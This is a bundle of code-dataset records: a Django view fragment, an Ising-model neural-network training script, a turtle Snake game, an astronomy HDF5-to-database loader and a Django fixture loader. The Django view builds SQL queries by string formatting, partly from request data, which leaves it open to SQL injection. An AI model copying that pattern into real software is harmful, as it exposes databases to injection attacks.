db.noneGetTable(\"INSERT INTO NHANDANG(IDNHANDANG, IDDICOM, TENFILE, KETQUA, PHAMTRAM) VALUES ('{0}', '{1}', '{2}', '{3}', {4})\".format(\n str(uuid.uuid1()), IDDICOM[0][0], item[\"src\"], item[\"ketqua\"], item[\"tile\"]\n ))\n return HttpResponse(json.dumps(arrayPath)) \n\n@csrf_exempt\ndef hinhAnhLienQuan(request):\n if request.method == 'POST':\n cluster = ClusterVectors()\n ketQua = []\n tenFile = request.POST.get(\"tenFile\")\n db = DBConnect()\n for item in cluster.ClusterVector(tenFile)[1:]:\n print(item[\"similarity\"])\n data = db.getTable(\"SELECT IDDICOM FROM DICOM WHERE TENFILE = '{0}'\".format(\n item[\"filename\"]\n ))\n tmp = db.getTable(\"SELECT TENFILE, KETQUA, PHAMTRAM FROM NHANDANG WHERE IDDICOM = '{0}'\".format(\n data[0][0]\n ))\n for kq in tmp: \n ketQua.append({\n 'tenfile' : kq[0],\n 'ketQua' : kq[1],\n 'phamTram' : kq[2],\n })\n \n return HttpResponse(json.dumps(ketQua))\n else:\n return HttpResponse(\"404\")","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139137930","text":"from neuralnetwork import *\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport os\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\n\"\"\"\nurl_main = \"https://physics.bu.edu/~pankajm/ML-Review-Datasets/isingMC/\"\ndata_file_name = \"Ising2DFM_reSample_L40_T=All.pkl\"\nlabel_file_name = \"Ising2DFM_reSample_L40_T=All_labels.pkl\"\n\nlabels = pickle.load(urlopen(url_main + label_file_name))\n\ndata = pickle.load(urlopen(url_main + data_file_name))\ndata = np.unpackbits(data).reshape(-1, 1600)\ndata = data.astype('int')\n\nnp.save(\"labels\", labels)\nnp.save(\"spin_data\", data)\n\"\"\"\n\ny = np.load(\"labels.npy\")\nX = np.load(\"spin_data.npy\")\n\ntanh = Tanh()\nsig = Sigmoid()\nrelu = Relu()\ncrossEntropy = CrossEntropy()\n\nnp.random.seed(42)\n\nnn = NeuralNetwork([1600, 400, 100, 25, 1], [sig, sig, sig, sig], crossEntropy)\n\nidx = np.arange(len(y))\nnp.random.shuffle(idx)\n\nidx_train = idx[:10000]\nidx_test = idx[10000:11000]\n\ny_train = y[idx_train]\nX_train = X[idx_train]\ny_test = y[idx_test]\nX_test = X[idx_test]\n\nnn.train(X_train, y_train, 0.0003, 100, 100)\n\n\ny_pred = np.round(nn.predict(X_test)[:, 0]).astype(int)\nprint(y_pred[:10])\nprint(y_test[:10])\n\nsuccess = np.sum(y_pred == y_test)\nprint(success / len(y_test))\n","sub_path":"Project2/src/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"485061292","text":"import turtle\n\nimport time\nimport random\n\n\n\nWIDTH=600\nHEIGHT=600\n\nFOOD_SIZE=10\nSQUARE_SIZE=20\nstepsize=20\ndelay=100\nscore=0\nhighscore=0\n\nsegments=[]\n\ndef move_snake():\n \n for index in range(len(segments)-1,0,-1):\n x=segments[index-1].xcor()\n y=segments[index-1].ycor()\n segments[index].goto(x,y)\n segments[index].showturtle()\n \n\n if len(segments)>0:\n x=head.xcor()\n y=head.ycor()\n segments[0].goto(x,y)\n segments[0].showturtle()\n if head.direction==\"up\":\n head.sety(head.ycor()+stepsize)\n\n elif head.direction==\"down\":\n head.sety(head.ycor()-stepsize)\n \n elif head.direction==\"left\":\n head.setx(head.xcor()-stepsize)\n \n elif head.direction==\"right\":\n head.setx(head.xcor()+stepsize)\n\ndef go_up():\n if head.direction !=\"down\":\n head.direction=\"up\"\n\ndef go_down():\n if head.direction !=\"up\":\n head.direction=\"down\"\n\ndef 
go_right():\n    if head.direction !=\"left\":\n        head.direction=\"right\"\n\ndef go_left():\n    if head.direction !=\"right\":\n        head.direction=\"left\"\n\n\ndef check_food():\n    global score,highscore\n    if head.distance(food)<SQUARE_SIZE:\n        # food eaten: move the food to a random spot, grow the tail and update the score\n        food.goto(random.randint(-WIDTH//2+SQUARE_SIZE,WIDTH//2-SQUARE_SIZE),random.randint(-HEIGHT//2+SQUARE_SIZE,HEIGHT//2-SQUARE_SIZE))\n        new_segment=turtle.Turtle()\n        new_segment.speed(0)\n        new_segment.shape(\"square\")\n        new_segment.color(\"grey\")\n        new_segment.penup()\n        new_segment.hideturtle()\n        segments.append(new_segment)\n        score+=1\n        if score>highscore:\n        highscore=score\n    pen.clear()\n    pen.write(f\"Score:{score} HighScore:{highscore}\",align=\"center\", font=(\"arial\",24,\"bold\"))\n\ndef check_body_collision():\n    global score\n    self_collision=False\n    for segment in segments:\n        if segment.distance(head)<SQUARE_SIZE:\n            self_collision=True\n    if head.xcor()<-WIDTH//2 or head.xcor()>WIDTH//2 or head.ycor()<-HEIGHT//2 or head.ycor()>HEIGHT//2:\n        self_collision=True\n    if self_collision:\n        score=0\n        newgame()\n\ndef play():\n    move_snake()\n    check_body_collision()\n    check_food()\n    wn.update()\n    turtle.ontimer(play,delay)\n\n\ndef newgame():\n    global head, food, segments, pen \n\n    wn.clear()\n    wn.bgcolor(\"yellow\")\n    wn.listen()\n    wn.onkey(go_up,\"Up\")\n    wn.onkey(go_down,\"Down\")\n    wn.onkey(go_right,\"Right\")\n    wn.onkey(go_left,\"Left\")\n\n\n    head=turtle.Turtle()\n    head.speed(0)\n    head.shape(\"square\")\n    head.color(\"black\")\n    head.penup()\n    head.goto(0,0)\n    head.direction=\"up\"\n\n    food=turtle.Turtle()\n    food.speed(0)\n    food.shape(\"triangle\")\n    food.color(\"red\")\n    food.penup()\n    food.shapesize(FOOD_SIZE/SQUARE_SIZE)\n    food.goto(100,100)\n\n    segments=[]\n    \n\n\n\nwn=turtle.Screen()\nwn.title(\"Snake Game\")\n\nwn.setup(WIDTH,HEIGHT)\nnewgame()\n\npen=turtle.Turtle()\npen.speed(0)\npen.shape(\"square\")\npen.color(\"black\")\npen.penup()\npen.hideturtle()\npen.goto(0,260)\npen.write(\"Score:0 HighScore: 0\",align=\"center\", font=(\"arial\",24,\"bold\"))\n\n\n\nplay()\n\nturtle.done()\n","sub_path":"snake_game_begginner.py","file_name":"snake_game_begginner.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"161402639","text":"#\n# (c) UWA, The University of Western Australia\n# M468/35 Stirling Hwy\n# Perth WA 6009\n# Australia\n#\n# Copyright by UWA, 2012-2015\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\"\"\"\nLoad data from the HDF5 files into the database\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport h5py\nimport math\nimport numpy\nimport time\nfrom sqlalchemy import create_engine, select, func\nfrom common import get_table_sed, get_galaxy_file_name, pidfile_exists, get_table_original, add_step_done_id, get_step_done_ids\nfrom configuration import DB_LOGIN\nfrom constants import OUTPUT_FORMAT_1_03, MAX_X_Y_BLOCK, BUCKET_NAME, QUEUE_LOAD_DATABASE, FILTERS, FAST_DISK, STEP_DONE_ID_ORIGINAL_VALUES, STEP_DONE_ID_SED_DATA, STEP_DONE_ID_NO_HDF5_FILE\nfrom database.tables import PARAMETER_STATISTIC, build_dynamic_tables, GALAXY, MASK, MASK_POINT\nfrom helpers.logging_helper import get_logger\nfrom helpers.s3_helper import S3Helper\nfrom helpers.sqs_helper import SqsHelper\n\nLOG = get_logger(__name__)\nLOG.debug('PYTHONPATH = {0}'.format(sys.path))\n\nPATH_TO_PIDFILE = FAST_DISK + '/load_database.pid'\n\n\ndef get_data_required_original(steps_done):\n # Get all the data\n data_required = []\n\n # have we marked this as missing the HDF5 file\n if [STEP_DONE_ID_NO_HDF5_FILE, None, None] in steps_done:\n return data_required\n\n for filter_name in FILTERS:\n step_done = [STEP_DONE_ID_ORIGINAL_VALUES, filter_name, None]\n if step_done not in steps_done:\n data_required.append(filter_name)\n\n return data_required\n\n\ndef get_data_required_sed(connection, steps_done):\n \"\"\"\n Get a list of the sed data required\n \"\"\"\n # Get all the data\n data_required = []\n # have we marked this as missing the HDF5 file\n if [STEP_DONE_ID_NO_HDF5_FILE, None, None] in steps_done:\n return data_required\n\n for pair in connection.execute(select([PARAMETER_STATISTIC])):\n parameter_id = pair[PARAMETER_STATISTIC.c.parameter_id]\n statistic_id = pair[PARAMETER_STATISTIC.c.statistic_id]\n\n step_done = [STEP_DONE_ID_SED_DATA, parameter_id, statistic_id]\n if step_done not in steps_done:\n data_required.append([parameter_id, statistic_id])\n\n data_required.sort(key=lambda x: (x[0], x[1]))\n\n return data_required\n\n\ndef get_chunks(dimension):\n \"\"\"\n Break the dimension up into chunks\n :param dimension:\n :return: a list with the number of chunks\n\n >>> get_chunks(1)\n [0]\n >>> get_chunks(10)\n [0]\n >>> get_chunks(1023)\n [0]\n >>> get_chunks(1024)\n [0]\n >>> get_chunks(1025)\n [0, 1]\n >>> get_chunks(2047)\n [0, 1]\n >>> get_chunks(2048)\n [0, 1]\n >>> get_chunks(2049)\n [0, 1, 2]\n\n \"\"\"\n return range(((dimension - 1) / MAX_X_Y_BLOCK) + 1)\n\n\ndef get_size(block, dimension):\n \"\"\"\n How big is this axis\n :param block:\n :param dimension:\n :return:\n\n >>> get_size(0, 50)\n 50\n >>> get_size(0, 1024)\n 1024\n >>> get_size(0, 2244)\n 1024\n >>> get_size(1, 2244)\n 1024\n >>> get_size(2, 2244)\n 196\n \"\"\"\n elements = get_chunks(dimension)\n if len(elements) == 1:\n return dimension\n elif block < len(elements) - 1:\n return MAX_X_Y_BLOCK\n\n return dimension - (block * MAX_X_Y_BLOCK)\n\n\ndef get_layer(filter_name, pixel_data):\n x, y, z = pixel_data.shape\n for (name, value) in pixel_data.attrs.items():\n if filter_name == name:\n # Some times the number of layers is wrong. The number of filters from the runid does not match the\n # actual ones in the SED file. 
The pixel_data attributes work from the SED file so use that\n if int(value) < z:\n return int(value)\n\n return -1\n\n\ndef insert_original_data(connection, filter_name, pixel_group, output_format, dimension_x, dimension_y, galaxy_id):\n table = get_table_original(filter_name)\n\n # Add the new data\n LOG.info('Adding data to table: original_value__{0}, galaxy_id: {1}'.format(filter_name.lower(), galaxy_id))\n insert_data = []\n start_time = time.time()\n layer = -1\n\n if output_format == OUTPUT_FORMAT_1_03:\n # If we only have one block then quickly copy it\n if dimension_x <= MAX_X_Y_BLOCK and dimension_y <= MAX_X_Y_BLOCK:\n pixel_data = pixel_group['pixel_filters_0_0']\n layer = get_layer(filter_name, pixel_data)\n if layer >= 0:\n data = pixel_data[:, :, layer]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n else:\n for block_x in get_chunks(dimension_x):\n for block_y in get_chunks(dimension_y):\n pixel_data = pixel_group['pixel_filters_{0}_{1}'.format(block_x, block_y)]\n layer = get_layer(filter_name, pixel_data)\n\n # Some times the number of layers is wrong\n if layer >= 0:\n size_x = get_size(block_x, dimension_x)\n size_y = get_size(block_y, dimension_y)\n\n x_offset = block_x * MAX_X_Y_BLOCK\n y_offset = block_y * MAX_X_Y_BLOCK\n\n # Copy the block back\n data = pixel_data[:, :, layer]\n for x in range(size_x):\n for y in range(size_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x + x_offset,\n \"y\": y + y_offset,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n else:\n if 'pixel_filters' in pixel_group.keys():\n pixel_data = pixel_group['pixel_filters']\n layer = get_layer(filter_name, pixel_data)\n if layer >= 0:\n data = pixel_data[:, :, layer]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if value[0] != 0.0 or value[1] != 0.0 or value[2] != 0.0:\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value[0]),\n \"sigma\": numpy.asscalar(value[1]),\n \"flux_bfm\": numpy.asscalar(value[2])\n }\n )\n\n # Bulk insert the data\n database_start = time.time()\n if len(insert_data) > 0:\n connection.execute(table.insert(), insert_data)\n\n total_time = -1\n if layer >= 0:\n end_time = time.time()\n database_time = end_time - database_start\n total_time = end_time - start_time\n LOG.info(\n 'insert_sed_data, table: {0}, galaxy_id: {1}, total_time: {2:.3f}s, database_time: {3:.3f}s, inserts: {4}'.format(\n table,\n galaxy_id,\n total_time,\n database_time,\n len(insert_data)\n )\n )\n\n return total_time\n\n\ndef insert_sed_data(connection, pair, pixel_group, output_format, dimension_x, dimension_y, galaxy_id):\n \"\"\"\n Get the data from the hdf5 file and put it into the database\n \"\"\"\n parameter_id = pair[0]\n statistic_id = pair[1]\n table = get_table_sed(parameter_id, statistic_id)\n\n # Add the new data\n LOG.info('insert_sed_data, table: {0}, galaxy_id: {1}'.format(table, galaxy_id))\n stored_count = 0\n insert_data = []\n start_time = time.time()\n\n if output_format == OUTPUT_FORMAT_1_03:\n # If we 
only have one block then quickly copy it\n if dimension_x <= MAX_X_Y_BLOCK and dimension_y <= MAX_X_Y_BLOCK:\n pixel_data = pixel_group['pixels_0_0']\n data = pixel_data[:, :, parameter_id, statistic_id]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n else:\n for block_x in get_chunks(dimension_x):\n for block_y in get_chunks(dimension_y):\n pixel_data = pixel_group['pixels_{0}_{1}'.format(block_x, block_y)]\n\n size_x = get_size(block_x, dimension_x)\n size_y = get_size(block_y, dimension_y)\n\n x_offset = block_x * MAX_X_Y_BLOCK\n y_offset = block_y * MAX_X_Y_BLOCK\n data = pixel_data[:, :, parameter_id, statistic_id]\n\n # Copy the block back\n for x in range(size_x):\n for y in range(size_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x + x_offset,\n \"y\": y + y_offset,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n else:\n if 'pixels' in pixel_group.keys():\n pixel_data = pixel_group['pixels']\n data = pixel_data[:, :, parameter_id, statistic_id]\n for x in range(dimension_x):\n for y in range(dimension_y):\n value = data[x, y]\n if not math.isnan(value):\n insert_data.append(\n {\n \"galaxy_id\": galaxy_id,\n \"x\": x,\n \"y\": y,\n \"value\": numpy.asscalar(value)\n }\n )\n stored_count += 1\n\n # Bulk insert the data\n database_start = time.time()\n if len(insert_data) > 0:\n connection.execute(table.insert(), insert_data)\n\n # The stored count. Sometimes a pixel doesn't get processed so the pixel count won't match the stored count\n connection.execute(GALAXY.update().values(stored_count=stored_count).where(GALAXY.c.galaxy_id == galaxy_id))\n\n end_time = time.time()\n database_time = end_time - database_start\n total_time = end_time - start_time\n LOG.info(\n 'insert_sed_data, table: {0}, galaxy_id: {1}, total_time: {2:.3f}s, database_time: {3:.3f}s, inserts: {4}'.format(\n table,\n galaxy_id,\n total_time,\n database_time,\n len(insert_data)\n )\n )\n return total_time\n\n\ndef add_sed_data(connection, galaxy_id, h5_file, data_required):\n galaxy_group = h5_file['galaxy']\n pixel_group = galaxy_group['pixel']\n\n count = 0\n total_time = 0\n # For each pair insert the data\n for pair in data_required:\n with connection.begin():\n time_for_pair = insert_sed_data(\n connection,\n pair,\n pixel_group,\n galaxy_group.attrs['output_format'],\n galaxy_group.attrs['dimension_x'],\n galaxy_group.attrs['dimension_y'],\n galaxy_id\n )\n add_step_done_id(connection, galaxy_id, STEP_DONE_ID_SED_DATA, pair[0], pair[1])\n count += 1\n total_time += time_for_pair\n\n LOG.info(\n 'add_sed_data, galaxy_id: {0}, total_time: {1:.3f}s, average_time: {2:.3f}s'.format(\n galaxy_id,\n total_time,\n total_time / count if count > 0 else 0\n )\n )\n\n\ndef add_original_data(connection, galaxy_id, h5_file, data_required):\n galaxy_group = h5_file['galaxy']\n pixel_group = galaxy_group['pixel']\n\n count = 0\n total_time = 0\n # Add the original values\n for filter_name in data_required:\n with connection.begin():\n time_for_filter = insert_original_data(\n connection,\n filter_name,\n pixel_group,\n galaxy_group.attrs['output_format'],\n galaxy_group.attrs['dimension_x'],\n galaxy_group.attrs['dimension_y'],\n galaxy_id\n )\n add_step_done_id(connection, galaxy_id, STEP_DONE_ID_ORIGINAL_VALUES, filter_name)\n\n 
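# insert_original_data returns -1 when the filter has no layer in the\n            # HDF5 file; the guard below keeps such filters out of the timing average.\n            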
if time_for_filter > 0:\n count += 1\n total_time += time_for_filter\n\n LOG.info(\n 'add_original_data, galaxy_id: {0}, total_time: {1:.3f}s, average_time: {2:.3f}s'.format(\n galaxy_id,\n total_time,\n total_time / count if count > 0 else 0\n )\n )\n\n\ndef need_to_build_mask(connection, galaxy_id):\n mask = connection.execute(\n select([MASK]).where(MASK.c.galaxy_id == galaxy_id)\n ).first()\n if mask is None:\n return True\n\n count = connection.execute(\n select([func.count(MASK_POINT.c.mask_point_id)]).where(MASK_POINT.c.galaxy_id == galaxy_id)\n ).first()[0]\n\n return count == 0\n\n\ndef process_galaxy(connection, galaxies, verbosity, profile_name='aws-pogs'):\n \"\"\"\n Process the galaxies\n \"\"\"\n # Build the tables\n build_dynamic_tables(connection)\n\n for galaxy in galaxies:\n galaxy_id = galaxy[GALAXY.c.galaxy_id]\n steps_done = get_step_done_ids(\n connection,\n galaxy_id,\n [STEP_DONE_ID_NO_HDF5_FILE, STEP_DONE_ID_ORIGINAL_VALUES, STEP_DONE_ID_SED_DATA],\n True,\n True\n )\n\n # Work out what SED data is required\n data_required_sed = get_data_required_sed(connection, steps_done)\n data_required_original = get_data_required_original(steps_done)\n\n if len(data_required_sed) > 0 or len(data_required_original) > 0:\n # Copy the file from S3\n s3_helper = S3Helper(profile_name=profile_name)\n galaxy_id = int(galaxy[GALAXY.c.galaxy_id])\n galaxy_name = get_galaxy_file_name(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id)\n s3_name = os.path.join('{0:04d}000'.format(galaxy_id / 1000), galaxy_name) + '.hdf5'\n hdf5_file_name = os.path.join(FAST_DISK, galaxy_name) + '.hdf5'\n\n copy_ok = s3_helper.copy_file_to_disk(BUCKET_NAME, s3_name, hdf5_file_name)\n\n if copy_ok:\n h5_file = h5py.File(hdf5_file_name, 'r')\n LOG.info('Processing SED for name: {0}, run_id: {1}, galaxy_id: {2}'.format(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id))\n # Do we have anything to do?\n if len(data_required_sed) > 0:\n # noinspection PyBroadException\n try:\n # Store the SED fit values\n add_sed_data(connection, galaxy_id, h5_file, data_required_sed)\n except Exception:\n LOG.exception('An exception occurred in process_galaxy processing the SED values')\n else:\n if verbosity >= 1:\n LOG.info('Nothing to add - SED')\n\n if len(data_required_original) > 0:\n # noinspection PyBroadException\n try:\n add_original_data(connection, galaxy_id, h5_file, data_required_original)\n except Exception:\n LOG.exception('An exception occurred in process_galaxy processing the original values')\n else:\n if verbosity >= 1:\n LOG.info('Nothing to add - Original Data')\n\n # Clean up after ourselves\n h5_file.close()\n os.remove(hdf5_file_name)\n\n else:\n LOG.error('The file for name: {0}, run_id: {1}, galaxy_id: {2} does not exist'.format(galaxy[GALAXY.c.name], galaxy[GALAXY.c.run_id], galaxy_id))\n\n\ndef command_sqs(args):\n no_message_counter = 0\n while True:\n sqs_helper = SqsHelper('us-east-1')\n queue = sqs_helper.get_queue(QUEUE_LOAD_DATABASE)\n\n # No queue yet\n if queue is None:\n break\n\n # Read the message\n message = queue.read(wait_time_seconds=10)\n\n if message is None:\n if no_message_counter >= 5:\n break\n else:\n no_message_counter += 1\n else:\n # Get the galaxy id and delete the message\n galaxy_id = int(message.get_body())\n LOG.info('Galaxy id: {0}'.format(galaxy_id))\n\n queue.delete_message(message)\n\n no_message_counter = 0\n galaxies = []\n\n engine = create_engine(DB_LOGIN)\n connection = engine.connect()\n\n for galaxy in connection.execute(\n 
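# fetch the full galaxy row for the id taken off the SQS queue\n                    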
select([GALAXY]).where(GALAXY.c.galaxy_id == galaxy_id)):\n galaxies.append(galaxy)\n\n if len(galaxies) > 0:\n process_galaxy(connection, galaxies, args.verbosity)\n\n connection.close()\n\n\ndef command_galaxy(args):\n galaxy_ids = []\n for galaxy_id in args.galaxy_ids:\n if galaxy_id.find('-') > 1:\n list_range = galaxy_id.split('-')\n galaxy_ids.extend(range(int(list_range[0]), int(list_range[1]) + 1))\n else:\n galaxy_ids.append(int(galaxy_id))\n\n galaxies = []\n\n engine = create_engine(DB_LOGIN)\n connection = engine.connect()\n\n for galaxy_id in galaxy_ids:\n galaxy = connection.execute(\n select([GALAXY]).where(GALAXY.c.galaxy_id == galaxy_id)\n ).first()\n if galaxy is not None:\n galaxies.append(galaxy)\n\n if len(galaxies) > 0:\n process_galaxy(connection, galaxies, args.verbosity)\n\n connection.close()\n\n\ndef main():\n parser = argparse.ArgumentParser('Get the data from the HDF5 files of theSkyNet POGS and store it in the database')\n subparsers = parser.add_subparsers()\n\n parser_sqs = subparsers.add_parser('sqs', help='SQS help')\n parser_sqs.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser_sqs.set_defaults(func=command_sqs)\n\n parser_galaxy = subparsers.add_parser('galaxy', help='galaxy help')\n parser_galaxy.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser_galaxy.add_argument('galaxy_ids', nargs='+', help='the galaxy ids or 4-30 if you need a range')\n parser_galaxy.set_defaults(func=command_galaxy)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n if not pidfile_exists(PATH_TO_PIDFILE):\n main()\n os.remove(PATH_TO_PIDFILE)\n","sub_path":"src/load_database.py","file_name":"load_database.py","file_ext":"py","file_size_in_byte":21269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621730507","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom hub.formats import Format\n\n\"\"\"\nFixture loading command. 
We don't use django fixtures because we want to verify that the input data are actually\nparseable.\n\nUsage:\n ./manage.py loadfixtures [--no-perfdata]\n\"\"\"\n\nimport logging\n\nfrom django.core.management.base import BaseCommand\nfrom django import db\nimport codecs\n\nfrom django.db import connection\nfrom hub.models import PackageModel\n\nfrom hub.tests.testutils import TestBase\nfrom hub.models import DocumentModel, FileGroupModel, FileModel, UrlModel, TransformationModel\nfrom hub import formats\nfrom hub.structures.file import FileGroup\nfrom hub.utils.odhql import TransformationUtil\n\nfrom hub.odhql.interpreter import OdhQLInterpreter\n\nlogging.getLogger('django.db.backends').setLevel(logging.WARN)\nfrom optparse import make_option\n\n\nclass Command(BaseCommand):\n help = 'Loads test data into the database'\n\n option_list = BaseCommand.option_list + (\n make_option('--no-perfdata', action='store_true', default=False, help='Do not import large dataset'),)\n\n def __init__(self, *args, **kwargs):\n super(Command, self).__init__()\n self.parse = kwargs.get('parse', True)\n\n IMPORT = [\n # first element in considered the main file\n (formats.CSV, 'mockaroo.com.csv',),\n (formats.JSON, 'mockaroo.com.json',),\n (formats.Excel, 'mockaroo.com.xlsx',),\n (formats.GML, 'gml/Bahnhoefe.gml', 'gml/Bahnhoefe.gfs', 'gml/Bahnhoefe.xsd',),\n (formats.GeoJSON, 'json/Bahnhoefe.json',),\n (formats.KML, 'kml/Bahnhoefe.kml',),\n (formats.Shapefile, 'shp/Bahnhoefe.shp', 'shp/Bahnhoefe.shx', 'shp/Bahnhoefe.dbf', 'shp/Bahnhoefe.ili'),\n (formats.Excel, 'trobdb/Baustellen Februar 2015.xls',),\n (formats.GML, 'trobdb/TbaBaustellenZHWFS.gml', 'trobdb/TbaBaustellenZHWFS.xsd'),\n (formats.GeoJSON, 'trobdb/tiefbaustelle.json',),\n (formats.XML, 'trobdb/truckinfo.xml',),\n (formats.KML, 'trobdb/Baustellen.kml',),\n (formats.INTERLIS1, 'itf/Bahnhoefe.ili', 'itf/Bahnhoefe.itf'),\n (formats.Excel, 'trobdb/Baustellen Mai 2015.xls',),\n (formats.Shapefile,) + tuple(\n 'mopub/GEB_Gebaeudeeingang.{}'.format(ext) for ext in ['dbf', 'prj', 'shp', 'shx']),\n (formats.CSV, 'mopub/myaddresses2.utf8.csv',),\n (formats.CSV, 'geocsv_point_xy/bahnhoefe_point_xy.csv', 'geocsv_point_xy/bahnhoefe_point_xy.csvt',\n 'geocsv_point_xy/bahnhoefe_point_xy.prj'),\n # Interlis 2 support was disabled - see documentation\n # ('interlis1/Bahnhoefe.ili', 'interlis1/Bahnhoefe.xml'): formats.INTERLIS2\n ]\n\n URLS = [\n ('http://maps.zh.ch/wfs/HaltestellenZHWFS', 'Haltestellen öffentlicher Verkehr ZH', formats.WFS),\n ('http://maps.zh.ch/wfs/TbaBaustellenZHWFS', 'Baustellen Kantonsstrassen ZH', formats.WFS)\n ]\n\n TRANSFORMATIONS = [\n ('trobdb/BaustellenExcel.odhql', 'TROBDB: Baustellen Februar 2015'),\n ('trobdb/tiefbaustelle-zh.odhql', 'TROBDB: Tiefbaustellen ZH (aus GeoJSON)'),\n ('trobdb/TruckInfo.odhql', 'TROBDB: TruckInfo'),\n ('trobdb/WFS-Baustellen-ZH.odhql', 'TROBDB: Baustellen Zürich (WFS)'),\n ('trobdb/Sanitize-Baustellen-kml.odhql', 'Sanitize Baustellen.kml'),\n ('trobdb/Baustellen-kml.odhql', 'TROBDB: Baustellen.kml'),\n ('trobdb/trobdb-union.odhql', 'TROBDB: Alle Daten'),\n ('mopub/myaddresses-geometry.odhql', 'MOPUB: Adressen mit Geometrie'),\n ]\n\n def add_document(self, desc, format, name):\n \"\"\" Adds a document to the database. 
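Names longer than 200 characters are truncated (with an ellipsis) to fit\n        the model field, and the original format is appended to the description. 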
\"\"\"\n if len(name) > 200:\n name = name[:197] + '...'\n\n desc = desc or 'Testdaten'\n doc = DocumentModel(name=name,\n description=desc + ' (Originalformat: {})'.format(format.name),\n private=False, owner=self.user)\n doc.save()\n return doc\n\n def add_fg(self, fg, format, name=None, desc=None):\n \"\"\" Adds and parses a file group. \"\"\"\n doc = self.add_document(desc, format, name or 'Test {}'.format(', '.join(fg.names)))\n\n file_group = FileGroupModel(document=doc)\n file_group.save()\n\n for f in fg:\n concrete_format = Format.identify(f)\n assert concrete_format in (None, format, formats.Other)\n file_model = FileModel(file_name=f.name, data=f.stream.getvalue(), file_group=file_group,\n format=concrete_format.name)\n file_model.save()\n\n if self.parse and format != formats.Other:\n file_group.to_file_group().to_df() # force parse & caching\n\n db.reset_queries()\n\n def add_url(self, url, format, name=None, desc=None):\n \"\"\" Adds and parses a url. \"\"\"\n doc = self.add_document(desc, format, name or 'Test {}'.format(url))\n\n file_group = FileGroupModel(document=doc)\n file_group.save()\n\n url_model = UrlModel(source_url=url, type='wfs' if format is formats.WFS else 'auto', file_group=file_group,\n refresh_after=3600)\n url_model.save()\n\n if self.parse and format != formats.Other:\n file_group.to_file_group().to_df() # force parse & caching\n\n def add_transformation(self, file, name, desc=None):\n \"\"\" Adds and executes a transformation. \"\"\"\n with codecs.open(file, 'r', 'utf-8') as f:\n transformation = TransformationModel(name=name, description=desc or name,\n transformation=unicode(f.read()),\n owner=self.user)\n transformation.save()\n\n file_groups, transformations = OdhQLInterpreter.parse_sources(transformation.transformation)\n\n if file_groups and len(file_groups) > 0:\n transformation.referenced_file_groups = FileGroupModel.objects.filter(id__in=file_groups.values())\n\n if transformations and len(transformations) > 0:\n transformation.referenced_transformations = TransformationModel.objects.filter(\n id__in=transformations.values())\n\n if self.parse:\n TransformationUtil.df_for_transformation(transformation, self.user.id)\n\n def handle(self, *args, **options):\n \"\"\" Entrypoint for django-admin. \"\"\"\n\n if not options.get('no_perfdata', False):\n self.__class__.IMPORT += (\n (formats.CSV, 'perf/employees.csv',),\n (formats.CSV, 'perf/children.csv',),\n )\n\n self.user = TestBase.get_test_user()\n\n for args in self.IMPORT:\n it = iter(args)\n format = next(it)\n fg = FileGroup.from_files(*[TestBase.get_test_file_path(f) for f in it])\n\n self.add_fg(fg, format)\n\n self.update_ids(1000)\n\n for (url, name, format) in self.URLS:\n self.add_url(url, format, name=name)\n\n self.update_ids(2000)\n\n for (file, name) in self.TRANSFORMATIONS:\n self.add_transformation(TestBase.get_test_file_path(file), name)\n\n self.update_ids(3000)\n\n # 